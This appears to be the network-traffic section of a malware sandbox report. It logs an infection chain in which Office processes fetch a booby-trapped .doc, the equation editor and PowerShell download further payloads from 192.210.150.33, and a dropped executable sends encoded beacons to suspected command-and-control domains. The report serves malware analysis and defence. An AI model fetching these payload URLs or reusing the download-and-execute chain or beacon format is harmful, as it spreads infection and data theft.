                                                  Aug 16, 2024 09:33:19.651364088 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651364088 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651372910 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651379108 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651393890 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651402950 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651408911 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651422977 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651424885 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651429892 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651442051 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651449919 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651458025 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651473999 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651482105 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651489019 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651499033 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651505947 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651516914 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651536942 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651551962 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651637077 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651652098 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651665926 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651679039 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651681900 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651696920 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651698112 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651714087 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651715040 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651727915 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651755095 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651755095 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651767015 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651778936 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651794910 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651808977 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651818991 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651837111 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651845932 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651920080 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651936054 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651949883 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651959896 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.651964903 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651978970 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.651993990 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652009010 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652012110 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652024984 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652039051 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652041912 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652041912 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652041912 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652050018 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652055025 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652067900 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652072906 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652086020 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652090073 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652102947 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.652103901 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652123928 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652131081 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.652153015 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.663794994 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.736927986 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.736972094 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.737003088 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.737008095 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.737021923 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.737037897 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.737039089 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.737047911 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.737055063 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.737068892 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.737071037 CEST804917445.33.6.223192.168.2.22
                                                  Aug 16, 2024 09:33:19.737090111 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.737109900 CEST4917480192.168.2.2245.33.6.223
                                                  Aug 16, 2024 09:33:19.737147093 CEST804917445.33.6.223192.168.2.22
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                  Aug 16, 2024 09:33:56.766050100 CEST53626728.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:57.770632029 CEST5647553192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:58.052933931 CEST53564758.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:59.066123962 CEST4938453192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:59.590054989 CEST53493848.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:34:00.594909906 CEST5484253192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:34:00.601912022 CEST53548428.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:34:05.603734970 CEST5810553192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:34:05.610862017 CEST53581058.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 16, 2024 09:32:28.243186951 CEST | 192.168.2.22 | 8.8.8.8 | 0xd2d4 | Standard query (0) | jiourl.com | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:30.157223940 CEST | 192.168.2.22 | 8.8.8.8 | 0xfe1 | Standard query (0) | jiourl.com | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:33.371850967 CEST | 192.168.2.22 | 8.8.8.8 | 0xc3c7 | Standard query (0) | jiourl.com | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:33.389169931 CEST | 192.168.2.22 | 8.8.8.8 | 0xee86 | Standard query (0) | jiourl.com | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:38.152575016 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | jiourl.com | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:38.166953087 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | jiourl.com | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:45.745479107 CEST | 192.168.2.22 | 8.8.8.8 | 0xb308 | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:13.792186975 CEST | 192.168.2.22 | 8.8.8.8 | 0xdb83 | Standard query (0) | www.magicface.shop | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:18.678900957 CEST | 192.168.2.22 | 8.8.8.8 | 0x1408 | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:29.321706057 CEST | 192.168.2.22 | 8.8.8.8 | 0xe22c | Standard query (0) | www.gymuniversity.net | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:42.470742941 CEST | 192.168.2.22 | 8.8.8.8 | 0xde79 | Standard query (0) | www.2886080.xyz | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:56.528057098 CEST | 192.168.2.22 | 8.8.8.8 | 0xae47 | Standard query (0) | www.jnnotary.org | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:57.770632029 CEST | 192.168.2.22 | 8.8.8.8 | 0x70c8 | Standard query (0) | www.jnnotary.org | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:59.066123962 CEST | 192.168.2.22 | 8.8.8.8 | 0x1e08 | Standard query (0) | www.jnnotary.org | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:34:00.594909906 CEST | 192.168.2.22 | 8.8.8.8 | 0x1a6c | Standard query (0) | www.jnnotary.org | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:34:05.603734970 CEST | 192.168.2.22 | 8.8.8.8 | 0xdfa2 | Standard query (0) | www.kcrkimya.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 16, 2024 09:32:28.257318974 CEST | 8.8.8.8 | 192.168.2.22 | 0xd2d4 | No error (0) | jiourl.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:28.257318974 CEST | 8.8.8.8 | 192.168.2.22 | 0xd2d4 | No error (0) | jiourl.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:30.178803921 CEST | 8.8.8.8 | 192.168.2.22 | 0xfe1 | No error (0) | jiourl.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:30.178803921 CEST | 8.8.8.8 | 192.168.2.22 | 0xfe1 | No error (0) | jiourl.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:33.387662888 CEST | 8.8.8.8 | 192.168.2.22 | 0xc3c7 | No error (0) | jiourl.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:33.387662888 CEST | 8.8.8.8 | 192.168.2.22 | 0xc3c7 | No error (0) | jiourl.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:33.397347927 CEST | 8.8.8.8 | 192.168.2.22 | 0xee86 | No error (0) | jiourl.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:33.397347927 CEST | 8.8.8.8 | 192.168.2.22 | 0xee86 | No error (0) | jiourl.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:38.165524006 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | jiourl.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:38.165524006 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | jiourl.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:38.174067974 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | jiourl.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:38.174067974 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | jiourl.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:32:45.755709887 CEST | 8.8.8.8 | 192.168.2.22 | 0xb308 | No error (0) | ia803104.us.archive.org |  | 207.241.232.154 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:13.799808979 CEST | 8.8.8.8 | 192.168.2.22 | 0xdb83 | No error (0) | www.magicface.shop |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:13.799808979 CEST | 8.8.8.8 | 192.168.2.22 | 0xdb83 | No error (0) | www.magicface.shop |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:18.687896013 CEST | 8.8.8.8 | 192.168.2.22 | 0x1408 | No error (0) | www.sqlite.org |  | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:29.329030037 CEST | 8.8.8.8 | 192.168.2.22 | 0xe22c | No error (0) | www.gymuniversity.net |  | 216.40.34.41 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:33:42.626090050 CEST | 8.8.8.8 | 192.168.2.22 | 0xde79 | No error (0) | www.2886080.xyz |  | 103.249.106.91 | A (IP address) | IN (0x0001) | false
Aug 16, 2024 09:34:05.610862017 CEST | 8.8.8.8 | 192.168.2.22 | 0xdfa2 | No error (0) | www.kcrkimya.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Aug 16, 2024 09:34:05.610862017 CEST | 8.8.8.8 | 192.168.2.22 | 0xdfa2 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Aug 16, 2024 09:34:05.610862017 CEST | 8.8.8.8 | 192.168.2.22 | 0xdfa2 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                  • jiourl.com
                                                  • ia803104.us.archive.org
                                                  • 192.210.150.33
                                                  • www.magicface.shop
                                                  • www.sqlite.org
                                                  • www.gymuniversity.net
                                                  • www.2886080.xyz
                                                  • www.kcrkimya.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 192.210.150.33 | 80 | 2456 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 16, 2024 09:32:29.135225058 CEST | 458 | OUT | GET /143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 192.210.150.33
                                                  Connection: Keep-Alive
Aug 16, 2024 09:32:29.642558098 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:29 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:41:05 GMT
                                                  ETag: "153ff-61f9fd945bad7"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 87039
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49169 | 192.210.150.33 | 80 | 2408 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 16, 2024 09:32:39.867055893 CEST | 271 | OUT | HEAD /143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc HTTP/1.1
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Host: 192.210.150.33
Aug 16, 2024 09:32:40.337342978 CEST | 322 | IN | HTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:40 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:41:05 GMT
                                                  ETag: "153ff-61f9fd945bad7"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 87039
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49170 | 192.210.150.33 | 80 | 300 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 16, 2024 09:32:40.944132090 CEST | 341 | OUT | GET /143/mekissedbutterburnwithstronglips.tIF HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 192.210.150.33
                                                  Connection: Keep-Alive
Aug 16, 2024 09:32:41.418989897 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:41 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:35:07 GMT
                                                  ETag: "2ca52-61f9fc3e5eccf"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 182866
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49172 | 192.210.150.33 | 80 | 3248 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 16, 2024 09:32:48.231410027 CEST | 75 | OUT | GET /143/WRG.txt HTTP/1.1
                                                  Host: 192.210.150.33
                                                  Connection: Keep-Alive
Aug 16, 2024 09:32:48.734596968 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:48 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:26:58 GMT
                                                  ETag: "5d2ac-61f9fa6c34c98"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 381612
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/plain


                                                  Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                  4           192.168.2.22  49173        76.223.54.146   80                1980  C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Aug 16, 2024 09:33:13.820579052 CEST  347                OUT        GET /0ulx/?wxW=zofEiiFYwMh5LxyNu6oXSdWWcV8B67J9aDve++7abqw+/Zo42KlxLGjQ5GeTBYQyUYmjspHec65DOWQ9USsomtD+rCjeozlP1YUdWHnMSZCr4BxwQwk8MB9FDMVL&o4=jn1L46 HTTP/1.1
                                                  Host: www.magicface.shop
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:14.297131062 CEST  393                IN         HTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Fri, 16 Aug 2024 07:33:14 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 253
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 78 57 3d 7a 6f 66 45 69 69 46 59 77 4d 68 35 4c 78 79 4e 75 36 6f 58 53 64 57 57 63 56 38 42 36 37 4a 39 61 44 76 65 2b 2b 37 61 62 71 77 2b 2f 5a 6f 34 32 4b 6c 78 4c 47 6a 51 35 47 65 54 42 59 51 79 55 59 6d 6a 73 70 48 65 63 36 35 44 4f 57 51 39 55 53 73 6f 6d 74 44 2b 72 43 6a 65 6f 7a 6c 50 31 59 55 64 57 48 6e 4d 53 5a 43 72 34 42 78 77 51 77 6b 38 4d 42 39 46 44 4d 56 4c 26 6f 34 3d 6a 6e 31 4c 34 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wxW=zofEiiFYwMh5LxyNu6oXSdWWcV8B67J9aDve++7abqw+/Zo42KlxLGjQ5GeTBYQyUYmjspHec65DOWQ9USsomtD+rCjeozlP1YUdWHnMSZCr4BxwQwk8MB9FDMVL&o4=jn1L46"}</script></head></html>


                                                  Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                  5           192.168.2.22  49174        45.33.6.223     80                3408  C:\Windows\SysWOW64\find.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Aug 16, 2024 09:33:18.698287964 CEST  220                OUT        GET /2017/sqlite-dll-win32-x86-3200000.zip HTTP/1.1
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Host: www.sqlite.org
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Aug 16, 2024 09:33:19.215090036 CEST  249                IN         HTTP/1.1 200 OK
                                                  Connection: keep-alive
                                                  Date: Fri, 16 Aug 2024 07:33:19 GMT
                                                  Last-Modified: Mon, 21 Aug 2017 00:19:00 GMT
                                                  Cache-Control: max-age=120
                                                  ETag: "m599a26f4s6ce10"
                                                  Content-type: application/zip; charset=utf-8
                                                  Content-length: 445968


                                                  Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                  6           192.168.2.22  49175        216.40.34.41    80                1980  C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Aug 16, 2024 09:33:29.348103046 CEST  2472               OUT        POST /rvs7/ HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.gymuniversity.net
                                                  Referer: http://www.gymuniversity.net/rvs7/
                                                  Content-Length: 2160
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:29.940567970 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                  content-type: text/html; charset=UTF-8
                                                  x-request-id: cdcb27b3-da02-4096-b5d1-f406d443117a
                                                  x-runtime: 0.043189
                                                  content-length: 20068
                                                  connection: close


                                                  Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                  7           192.168.2.22  49176        216.40.34.41    80                1980  C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Aug 16, 2024 09:33:31.888699055 CEST  623                OUT        POST /rvs7/ HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.gymuniversity.net
                                                  Referer: http://www.gymuniversity.net/rvs7/
                                                  Content-Length: 200
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 5a 53 33 57 77 75 78 36 4d 79 32 4d 53 4b 41 57 44 50 79 77 76 33 6f 2f 6a 6f 38 74 4c 44 48 66 2b 57 76 36 76 5a 55 2b 7a 78 47 41 36 36 7a 39 73 54 75 2b 33 47 71 55 73 77 36 56 50 79 56 6d 51 2b 57 73 65 6e 44 6b 4e 41 4e 48 2b 4e 54 41 46 73 34 78 5a 65 59 4f 72 72 37 31 6e 7a 50 70 65 67 75 7a 37 56 38 38 63 31 32 52 50 41 4c 39 70 7a 57 57 33 71 74 57 62 46 72 70 76 6a 30 7a 48 38 69 68 31 38 30 6a 41 79 4a 77 47 42 46 41 39 64 44 65 48 2b 33 2f 4d 49 75 5a 30 68 6c 30 46 2f 42 65 4a 6b 41 6c 77 69 32 50 57 2f 2b 76 7a 43 6d 43 6c 52 77 4f 47 68 43 49 43 4c 45 45 34 51 3d 3d
                                                  Data Ascii: wxW=ZS3Wwux6My2MSKAWDPywv3o/jo8tLDHf+Wv6vZU+zxGA66z9sTu+3GqUsw6VPyVmQ+WsenDkNANH+NTAFs4xZeYOrr71nzPpeguz7V88c12RPAL9pzWW3qtWbFrpvj0zH8ih180jAyJwGBFA9dDeH+3/MIuZ0hl0F/BeJkAlwi2PW/+vzCmClRwOGhCICLEE4Q==
                                                  Aug 16, 2024 09:33:32.417577028 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                  content-type: text/html; charset=UTF-8
                                                  x-request-id: ea8adc26-e34f-4563-b38d-a90a6d776e28
                                                  x-runtime: 0.055378
                                                  content-length: 18108
                                                  connection: close


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.22 | 49177 | 216.40.34.41 | 80 | 1980 | C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 16, 2024 09:33:34.431818962 CEST | 2472 | OUT | POST /rvs7/ HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.gymuniversity.net
                                                  Referer: http://www.gymuniversity.net/rvs7/
                                                  Content-Length: 3624
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:35.043414116 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  content-type: text/html; charset=UTF-8
                                                  x-request-id: 5dce5dc8-dfe6-4c3c-973a-f7abe45f17b2
                                                  x-runtime: 0.070311
                                                  content-length: 21532
                                                  connection: close


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  9 | 192.168.2.22 | 49178 | 216.40.34.41 | 80 | 1980 | C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 16, 2024 09:33:36.972538948 CEST | 350 | OUT | GET /rvs7/?wxW=UQf2zZJYDDL8KJweJNWXsncMp4MNFyy9iRmYgJ1J0zvq5qbAtDjd5xC0uH7MRjdVGt6kOkDqEQprzunrZ/YXaY0e9aCWqBKlXSvt2l82CG6FMXzOxBXJ399Rbxel&o4=jn1L46 HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
